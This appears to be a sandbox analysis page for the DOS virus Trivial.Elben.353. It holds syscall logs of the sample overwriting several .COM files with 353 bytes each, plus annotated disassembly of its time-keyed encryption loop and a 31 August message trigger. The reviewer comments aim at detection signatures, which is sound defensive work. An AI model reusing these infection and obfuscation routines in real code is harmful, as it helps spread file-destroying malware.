Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Elben.353


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:35.889638717Z 78 PC: 12a9b | Find first file
; Disassembler window shown for the "Get time" row (op 44 = INT 21h AH=2Ch).
; Only 0x12b1c-0x12b25 and 0x12b3a onward decode cleanly here: 0x12b26-0x12b31 hold
; data, which leaves the decoder one byte out of step until 0x12b3a.
2018-12-17T22:52:35.896454891Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX as returned by the call (DOS: DH=seconds, DL=hundredths)
0x12b1f: je 0x12b18  ; DX == 0: branch back to 0x12b18 (outside this window; presumably asks for the time again)
0x12b21: mov word ptr [0x1ee], dx  ; save the non-zero time word at DS:0x1EE
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]  ; data, not code: 2A 2E 43 4F ...
0x12b2a: dec bp  ; ... 4D, i.e. the ASCII file mask "*.COM"
0x12b2b: add byte ptr [bx + si], al  ; data: zero bytes
0x12b2d: add byte ptr [bx + si], al  ; data: zero bytes
0x12b2f: add byte ptr [bx + si], al  ; data: zero bytes
0x12b31: add al, ch  ; 00 E8: a zero data byte fused with the opcode of a call at 0x12b32
0x12b33: inc bx  ; misaligned decode of that call's operand (E8 43 00 = call 0x12b78)
0x12b34: add byte ptr [bp + di - 0x13c2], al  ; misaligned: bytes 83 3E EC begin `cmp word ptr [0x1ec], 0`
0x12b38: add word ptr [bx + si], ax  ; misaligned: 01 00 complete that cmp, which feeds the je below
0x12b3a: je 0x12b4a  ; word counter at DS:0x1EC is zero: leave the loop
0x12b3c: lodsw ax, word ptr [si]  ; AX = next source word at DS:SI
0x12b3d: ror ax, cl  ; rotate by the low byte of the key in CX
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; ror/xor/add: word-wise transform keyed by CX (CX is loaded outside this window)
0x12b43: stosw word ptr es:[di], ax  ; write the transformed word to ES:DI
0x12b44: dec word ptr [0x1ec]  ; one word fewer to process
; NOTE(review): this loop sits between Get time and the 353-byte write, so the written
; body presumably differs per file; the constant loop bytes are the steadier match target.
2018-12-17T22:52:35.900616558Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:35.908161371Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.91572497Z 62 PC: 12a7a | Close file
2018-12-17T22:52:35.931621792Z 79 PC: 12aa9 | Find next file
; Window for the second "Get time" row (INT 21h AH=2Ch). 0x12b26-0x12b31 is data
; decoded as instructions; code resumes at the call at 0x12b32.
2018-12-17T22:52:35.940523213Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX = seconds/hundredths returned by DOS
0x12b1f: je 0x12b18  ; zero value is rejected: loop back to 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; store the time word at DS:0x1EE
0x12b25: ret
0x12b26: sub word ptr [di], bp  ; data: 29 2D ...
0x12b28: inc dx  ; ... 42 ...
0x12b29: dec si  ; ... 4E ...
0x12b2a: dec sp  ; ... 4C = ")-BNL", which is "*.COM" with every byte lowered by one
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bp + si + 0x3b], al  ; data: 00 42 3B; non-zero now, zero in the first snapshot (presumably the saved time word - confirm)
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; helper outside this window; what it sets up is not visible here
0x12b35: cmp word ptr [0x1ec], 0  ; loop head: words left to process?
0x12b3a: je 0x12b4a  ; none left: exit
0x12b3c: lodsw ax, word ptr [si]  ; AX = word at DS:SI
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; three-step transform keyed by CX
0x12b43: stosw word ptr es:[di], ax  ; store result at ES:DI
0x12b44: dec word ptr [0x1ec]  ; decrement the remaining-word counter
2018-12-17T22:52:35.943308855Z 61 PC: 12a67 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:52:35.952353947Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.960502343Z 62 PC: 12a7a | Close file
2018-12-17T22:52:35.969411399Z 79 PC: 12aa9 | Find next file
; Window for the third "Get time" row. Same code as the earlier snapshots; only the
; data bytes at 0x12b26-0x12b31 differ.
2018-12-17T22:52:35.97344758Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; test the time word returned in DX
0x12b1f: je 0x12b18  ; zero: retry path at 0x12b18 (outside the window)
0x12b21: mov word ptr [0x1ee], dx  ; remember it at DS:0x1EE
0x12b25: ret
0x12b26: sub byte ptr [si], ch  ; data: 28 2C ...
0x12b28: inc cx  ; ... 41 ...
0x12b29: dec bp  ; ... 4D ...
0x12b2a: dec bx  ; ... 4B; each byte is again one lower than in the previous snapshot
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bp + si + 0x3b], al  ; data: 00 42 3B (same word 0x3B42 as the previous snapshot)
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; target not shown on this page
0x12b35: cmp word ptr [0x1ec], 0  ; counter at DS:0x1EC exhausted?
0x12b3a: je 0x12b4a  ; yes: skip the loop body
0x12b3c: lodsw ax, word ptr [si]  ; fetch a word from DS:SI
0x12b3d: ror ax, cl  ; rotate right by CL
0x12b3f: xor ax, cx  ; mix with CX
0x12b41: add ax, cx  ; add CX
0x12b43: stosw word ptr es:[di], ax  ; emit to ES:DI
0x12b44: dec word ptr [0x1ec]  ; count the word as done
2018-12-17T22:52:35.976711963Z 61 PC: 12a67 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:52:35.984260864Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.991783805Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.005581073Z 79 PC: 12aa9 | Find next file
; Window for the fourth "Get time" row. This capture is long enough to show the
; backward jump that closes the transform loop.
2018-12-17T22:52:36.009067332Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX = time word from INT 21h AH=2Ch
0x12b1f: je 0x12b18  ; a zero value sends control back to 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; save at DS:0x1EE
0x12b25: ret
0x12b26: daa  ; data, not code: 27 ...
0x12b27: sub ax, word ptr [bx + si + 0x4c]  ; ... 2B 40 4C ...
0x12b2a: dec dx  ; ... 4A
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bx + 0x3b], al  ; data: 00 47 3B; the stored word has changed since the previous snapshot
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; helper outside this window
0x12b35: cmp word ptr [0x1ec], 0  ; loop head: remaining word count
0x12b3a: je 0x12b4a  ; zero: done
0x12b3c: lodsw ax, word ptr [si]  ; read source word
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; CX-keyed transform of the word
0x12b43: stosw word ptr es:[di], ax  ; write destination word
0x12b44: dec word ptr [0x1ec]  ; update the counter
0x12b48: jmp 0x12b35  ; back to the loop head
2018-12-17T22:52:36.012855748Z 61 PC: 12a67 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:52:36.03062084Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.037955378Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.048221943Z 79 PC: 12aa9 | Find next file
; Window for the fifth "Get time" row; code identical to the earlier snapshots.
2018-12-17T22:52:36.05194125Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; reject a zero time word
0x12b1f: je 0x12b18  ; retry path, outside this window
0x12b21: mov word ptr [0x1ee], dx  ; DS:0x1EE = DX
0x12b25: ret
0x12b26: sub bh, byte ptr es:[bx]  ; data, not code: 26 2A 3F ...
0x12b29: dec bx  ; ... 4B ...
0x12b2a: dec cx  ; ... 49
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bx + 0x3b], al  ; data: 00 47 3B
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; not shown on this page
0x12b35: cmp word ptr [0x1ec], 0  ; any words left?
0x12b3a: je 0x12b4a  ; no: leave
0x12b3c: lodsw ax, word ptr [si]  ; AX = [DS:SI]
0x12b3d: ror ax, cl  ; step 1: rotate by CL
0x12b3f: xor ax, cx  ; step 2: xor with CX
0x12b41: add ax, cx  ; step 3: add CX
0x12b43: stosw word ptr es:[di], ax  ; [ES:DI] = AX
0x12b44: dec word ptr [0x1ec]  ; remaining count at DS:0x1EC
0x12b48: jmp 0x12b35  ; next word
2018-12-17T22:52:36.055004024Z 61 PC: 12a67 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:52:36.062788216Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.071243639Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.079910409Z 79 PC: 12aa9 | Find next file
; Window for the sixth "Get time" row. The five bytes at 0x12b26 keep stepping down
; by one per snapshot while the instructions stay constant.
2018-12-17T22:52:36.084647087Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX holds seconds/hundredths from DOS
0x12b1f: je 0x12b18  ; zero: go back to 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; keep the value at DS:0x1EE
0x12b25: ret
0x12b26: and ax, 0x3e29  ; data, not code: 25 29 3E ...
0x12b29: dec dx  ; ... 4A ...
0x12b2a: dec ax  ; ... 48
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [di + 0x3b], cl  ; data: 00 4D 3B
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; helper outside this window
0x12b35: cmp word ptr [0x1ec], 0  ; loop condition on the word counter
0x12b3a: je 0x12b4a  ; finished
0x12b3c: lodsw ax, word ptr [si]  ; load
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; transform keyed by CX
0x12b43: stosw word ptr es:[di], ax  ; store
0x12b44: dec word ptr [0x1ec]  ; count down
0x12b48: jmp 0x12b35  ; repeat
2018-12-17T22:52:36.088484206Z 61 PC: 12a67 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:52:36.095639176Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.104848065Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.113466755Z 79 PC: 12aa9 | Find next file
; Window for the seventh "Get time" row. This is the only capture in this run that
; reaches the ret at 0x12b4a, the exit target of the je at 0x12b3a.
2018-12-17T22:52:36.117684798Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; time word must be non-zero
0x12b1f: je 0x12b18  ; otherwise branch back (target not shown)
0x12b21: mov word ptr [0x1ee], dx  ; store at DS:0x1EE
0x12b25: ret
0x12b26: and al, 0x28  ; data, not code: 24 28 ...
0x12b28: cmp ax, 0x4749  ; ... 3D 49 47
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [di + 0x3b], cl  ; data: 00 4D 3B
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; outside this window
0x12b35: cmp word ptr [0x1ec], 0  ; loop head
0x12b3a: je 0x12b4a  ; counter zero: fall out to the ret below
0x12b3c: lodsw ax, word ptr [si]  ; source word from DS:SI
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; ror/xor/add with CX as the key
0x12b43: stosw word ptr es:[di], ax  ; destination word to ES:DI
0x12b44: dec word ptr [0x1ec]  ; one word consumed
0x12b48: jmp 0x12b35  ; loop
0x12b4a: ret  ; end of the transform routine
2018-12-17T22:52:36.120530043Z 61 PC: 12a67 | Open file (Filename = 'PAH.COM')
2018-12-17T22:52:36.127883176Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.136269169Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.145180469Z 79 PC: 12aa9 | Find next file
; Window for the eighth and last "Get time" row of this run.
2018-12-17T22:52:36.148544418Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; check the returned time word
0x12b1f: je 0x12b18  ; zero: retry at 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; DS:0x1EE receives DX
0x12b25: ret
0x12b26: and sp, word ptr [bx]  ; data, not code: 23 27 ...
0x12b28: cmp al, 0x48  ; ... 3C 48 ...
0x12b2a: inc si  ; ... 46
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bp + si + 0x3b], dl  ; data: 00 52 3B
0x12b30: add byte ptr [bx + si], al  ; data: 00 00
0x12b32: call 0x12b78  ; helper not shown
0x12b35: cmp word ptr [0x1ec], 0  ; words remaining?
0x12b3a: je 0x12b4a  ; none: exit
0x12b3c: lodsw ax, word ptr [si]  ; read word
0x12b3d: ror ax, cl  ; rotate by CL
0x12b3f: xor ax, cx  ; xor with CX
0x12b41: add ax, cx  ; add CX
0x12b43: stosw word ptr es:[di], ax  ; write word
0x12b44: dec word ptr [0x1ec]  ; decrement counter
0x12b48: jmp 0x12b35  ; continue
2018-12-17T22:52:36.15308098Z 61 PC: 12a67 | Open file (Filename = 'TEST.COM')
2018-12-17T22:52:36.161388596Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.164286008Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.172924666Z 79 PC: 12aa9 | Find next file
; Window for the "Get date" row (op 42 = INT 21h AH=2Ah): a date-triggered message.
; Code ends at the int 0x20 at 0x12ac4; everything from 0x12ac6 on is text that the
; disassembler has decoded as instructions.
2018-12-17T22:52:36.175483292Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8  ; DH = month returned by DOS: August?
0x12ab6: jne 0x12ac4  ; other month: straight to exit
0x12ab8: cmp dl, 0x1f  ; DL = day of month: the 31st?
0x12abb: jne 0x12ac4  ; other day: straight to exit
0x12abd: mov ah, 9  ; DOS function 09h: print '$'-terminated string at DS:DX
0x12abf: mov dx, 0x186  ; NOTE(review): presumably the text at 0x12ac6 below - confirm the segment base
0x12ac2: int 0x21
0x12ac4: int 0x20  ; terminate the program
0x12ac6: or ax, 0x460a  ; text, not code: 0D 0A 46 = CR LF "F"
0x12ac9: sub ax, 0x5250  ; 2D 50 52 = "-PR"
0x12acc: dec di  ; 4F = "O"
0x12acd: push sp  ; 54 = "T"
0x12ace: and byte ptr [bp + di + 0x55], dl  ; 20 53 55 = " SU"
0x12ad1: pop ax  ; 58 = "X"
0x12ad2: pop ax  ; 58 = "X"
0x12ad3: pop ax  ; 58 = "X"
0x12ad4: pop ax  ; 58 = "X"
0x12ad5: and word ptr [di], cx  ; 21 0D = "!" CR
0x12ad7: or dl, byte ptr [si + 0x42]  ; 0A 54 42 = LF "TB"
0x12ada: inc cx  ; 41 = "A"; the text continues past this window
; The run-configuration lines on this page give Day 1, Month 1, so the message branch
; is presumably not taken in these runs; the plaintext is still a usable static indicator.

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10940,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.272098495Z 78 PC: 12a9b | Find first file
; Disassembler window for the first "Get time" row of this run (INT 21h AH=2Ch).
; 0x12b26-0x12b31 is data, so the decode from 0x12b26 to 0x12b38 is unreliable;
; it realigns at 0x12b3a.
2018-12-25T12:29:45.278947439Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX = seconds/hundredths returned by DOS
0x12b1f: je 0x12b18  ; zero: branch back to 0x12b18 (outside this window)
0x12b21: mov word ptr [0x1ee], dx  ; save the time word at DS:0x1EE
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]  ; data: 2A 2E 43 4F ...
0x12b2a: dec bp  ; ... 4D = ASCII "*.COM"
0x12b2b: add byte ptr [bx + si], al  ; data: zero bytes
0x12b2d: add byte ptr [bx + si], al  ; data: zero bytes
0x12b2f: add byte ptr [bx + si], al  ; data: zero bytes
0x12b31: add al, ch  ; 00 E8: zero byte plus the opcode of a call at 0x12b32
0x12b33: inc bx  ; misaligned: operand of that call (E8 43 00 = call 0x12b78)
0x12b34: add byte ptr [bp + di - 0x13c2], al  ; misaligned: 83 3E EC start `cmp word ptr [0x1ec], 0`
0x12b38: add word ptr [bx + si], ax  ; misaligned: 01 00 end that cmp
0x12b3a: je 0x12b4a  ; counter at DS:0x1EC is zero: exit the loop
0x12b3c: lodsw ax, word ptr [si]  ; AX = word at DS:SI
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; word transform keyed by CX (CX is set outside this window)
0x12b43: stosw word ptr es:[di], ax  ; result to ES:DI
0x12b44: dec word ptr [0x1ec]  ; one word fewer remaining
2018-12-25T12:29:45.281468679Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.287575361Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:45.295237652Z 62 PC: 12a7a | Close file
2018-12-25T12:29:45.400840758Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:45.403732599Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.406376904Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.414459294Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.421774884Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.430815323Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.433724415Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.436085992Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.443120722Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.450780872Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.459387354Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.462192381Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.465136591Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.47223667Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.47974421Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.491073287Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.494845397Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.497603086Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.506426405Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.513888347Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.522182766Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.525048537Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.527623356Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.534872463Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.542417498Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.551550243Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.554533083Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.557072429Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.564607488Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.571999234Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.581311542Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.593567708Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.596129942Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.603305571Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.606872676Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.615887222Z 79 PC: 12aa9 | Find next file (See above)
; Window for the "Get date" row (INT 21h AH=2Ah). Two compares gate a DOS
; print-string call; the lines after int 0x20 are message text, not instructions.
2018-12-25T12:29:45.618482627Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8  ; month (DH) == 8?
0x12ab6: jne 0x12ac4  ; no: exit
0x12ab8: cmp dl, 0x1f  ; day (DL) == 31?
0x12abb: jne 0x12ac4  ; no: exit
0x12abd: mov ah, 9  ; print '$'-terminated string
0x12abf: mov dx, 0x186  ; string offset in DS; presumably the text starting at 0x12ac6 - confirm
0x12ac2: int 0x21
0x12ac4: int 0x20  ; DOS program terminate
0x12ac6: or ax, 0x460a  ; text bytes 0D 0A 46: CR LF "F"
0x12ac9: sub ax, 0x5250  ; text bytes 2D 50 52: "-PR"
0x12acc: dec di  ; "O"
0x12acd: push sp  ; "T"
0x12ace: and byte ptr [bp + di + 0x55], dl  ; text bytes 20 53 55: " SU"
0x12ad1: pop ax  ; "X"
0x12ad2: pop ax  ; "X"
0x12ad3: pop ax  ; "X"
0x12ad4: pop ax  ; "X"
0x12ad5: and word ptr [di], cx  ; text bytes 21 0D: "!" CR
0x12ad7: or dl, byte ptr [si + 0x42]  ; text bytes 0A 54 42: LF "TB"
0x12ada: inc cx  ; "A"; window ends mid-string

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10940,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.851505741Z 78 PC: 12a9b | Find first file
; First "Get time" window of this run (INT 21h AH=2Ch). Treat 0x12b26-0x12b38 as
; data plus misaligned decode; the listing is trustworthy again from 0x12b3a.
2018-12-25T12:29:45.858784925Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; is the returned time word zero?
0x12b1f: je 0x12b18  ; yes: back to 0x12b18 (not shown)
0x12b21: mov word ptr [0x1ee], dx  ; no: keep it at DS:0x1EE
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]  ; data: "*.CO" (2A 2E 43 4F)
0x12b2a: dec bp  ; data: "M" (4D), completing the mask "*.COM"
0x12b2b: add byte ptr [bx + si], al  ; data: 00 00
0x12b2d: add byte ptr [bx + si], al  ; data: 00 00
0x12b2f: add byte ptr [bx + si], al  ; data: 00 00
0x12b31: add al, ch  ; 00 then E8, the first byte of a call at 0x12b32
0x12b33: inc bx  ; misaligned: 43 belongs to that call (E8 43 00 = call 0x12b78)
0x12b34: add byte ptr [bp + di - 0x13c2], al  ; misaligned: contains 83 3E EC of `cmp word ptr [0x1ec], 0`
0x12b38: add word ptr [bx + si], ax  ; misaligned: 01 00, tail of that cmp
0x12b3a: je 0x12b4a  ; no words left: leave
0x12b3c: lodsw ax, word ptr [si]  ; load word from DS:SI
0x12b3d: ror ax, cl  ; rotate right by CL
0x12b3f: xor ax, cx  ; xor with CX
0x12b41: add ax, cx  ; add CX
0x12b43: stosw word ptr es:[di], ax  ; store word at ES:DI
0x12b44: dec word ptr [0x1ec]  ; decrement the word counter at DS:0x1EC
2018-12-25T12:29:45.875360076Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.883116922Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:45.89215081Z 62 PC: 12a7a | Close file
2018-12-25T12:29:45.908821838Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:45.912056406Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.915196408Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.924550754Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.934241146Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.939905372Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.94235345Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.944013708Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.9483818Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.956146685Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.974148349Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.976919249Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.982206493Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.989178321Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.995891622Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.010731112Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.013774266Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.016329854Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.023625758Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.031536608Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.04075768Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.044432756Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.048579687Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.055861316Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.063349196Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.073333848Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.076328659Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.078862544Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.086843812Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.094125376Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.103748008Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.10804876Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.110969812Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.118550259Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.121941831Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.132231638Z 79 PC: 12aa9 | Find next file (See above)
; "Get date" window (INT 21h AH=2Ah): the message is printed only on 31 August.
; Instructions stop at 0x12ac4; 0x12ac6 onward is the message text itself.
2018-12-25T12:29:46.135397612Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8  ; DH = month from DOS
0x12ab6: jne 0x12ac4  ; not August: exit
0x12ab8: cmp dl, 0x1f  ; DL = day from DOS
0x12abb: jne 0x12ac4  ; not the 31st: exit
0x12abd: mov ah, 9  ; select DOS print-string
0x12abf: mov dx, 0x186  ; DS:DX -> message (presumably the bytes at 0x12ac6 - confirm)
0x12ac2: int 0x21
0x12ac4: int 0x20  ; terminate
0x12ac6: or ax, 0x460a  ; text: CR LF "F"
0x12ac9: sub ax, 0x5250  ; text: "-PR"
0x12acc: dec di  ; text: "O"
0x12acd: push sp  ; text: "T"
0x12ace: and byte ptr [bp + di + 0x55], dl  ; text: " SU"
0x12ad1: pop ax  ; text: "X"
0x12ad2: pop ax  ; text: "X"
0x12ad3: pop ax  ; text: "X"
0x12ad4: pop ax  ; text: "X"
0x12ad5: and word ptr [di], cx  ; text: "!" CR
0x12ad7: or dl, byte ptr [si + 0x42]  ; text: LF "TB"
0x12ada: inc cx  ; text: "A" (string runs on beyond the window)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10940,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.95759734Z 78 PC: 12a9b | Find first file
; First "Get time" window of this run (INT 21h AH=2Ch). The file mask and zeroed
; variables at 0x12b26-0x12b31 are data, which skews the decode up to 0x12b38.
2018-12-25T12:29:45.980123195Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0  ; DX = time word just returned
0x12b1f: je 0x12b18  ; zero: loop back to 0x12b18 (outside the window)
0x12b21: mov word ptr [0x1ee], dx  ; record it at DS:0x1EE
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]  ; data: 2A 2E 43 4F
0x12b2a: dec bp  ; data: 4D; together "*.COM"
0x12b2b: add byte ptr [bx + si], al  ; data: zeros
0x12b2d: add byte ptr [bx + si], al  ; data: zeros
0x12b2f: add byte ptr [bx + si], al  ; data: zeros
0x12b31: add al, ch  ; zero byte + E8 (call opcode at 0x12b32)
0x12b33: inc bx  ; misaligned call operand (E8 43 00 = call 0x12b78)
0x12b34: add byte ptr [bp + di - 0x13c2], al  ; misaligned start of `cmp word ptr [0x1ec], 0`
0x12b38: add word ptr [bx + si], ax  ; misaligned end of that cmp
0x12b3a: je 0x12b4a  ; zero counter: skip the transform
0x12b3c: lodsw ax, word ptr [si]  ; next input word
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx  ; keyed by CX throughout
0x12b43: stosw word ptr es:[di], ax  ; next output word
0x12b44: dec word ptr [0x1ec]  ; remaining words -= 1
2018-12-25T12:29:45.983673526Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.992256708Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:46.001160515Z 62 PC: 12a7a | Close file
2018-12-25T12:29:46.020931323Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:46.024392241Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.027737046Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.035831356Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.043636918Z 62 PC: 12a7a | Close file (See above)
